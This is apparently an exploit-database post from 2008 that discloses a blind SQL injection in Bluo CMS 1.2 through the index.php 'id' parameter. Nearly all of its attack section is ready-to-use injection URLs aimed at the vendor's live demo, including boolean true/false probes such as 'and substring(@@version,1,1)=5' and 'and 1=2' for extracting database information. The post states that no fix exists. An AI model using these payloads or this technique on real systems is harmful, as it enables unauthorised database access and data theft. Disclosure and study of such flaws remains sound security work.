Bluo CMS 1.2 (index.php id) Blind SQL Injection Vulnerability

2008-11-28 23:30:09

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
Bluo cms 1.2 blind sql injection Vulnerability +
+
Discovered by : The_5p3ctrum +
Contact AUTHOR: sp3[at]linuxmail.org & 5p[at]linuxmail.org + +
+
Mor0ccan Nightmares +
+
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#####################################################

APPLICATION : bluocms
DOWNLOAD(299 $): http://www.bluocms.com/shop.php
VENDOR : http://www.bluocms.com
DEMO : http://www.bluocms.com/demo

#####################################################


[+] vuln : blind sql injection


[+] Exploit :
true:

http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=5
http://www.bluocms.com/demo/index.php?id=511 and 1=1

false:

http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=4
http://www.bluocms.com/demo/index.php?id=511 and 1=2

##########################################################################################################
#
# Greetings: str0ke, BayHay, Cyber-Zone, Drackanz, The_leo, The_Casper, Fucker_Net, And All my friends #
#
##########################################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.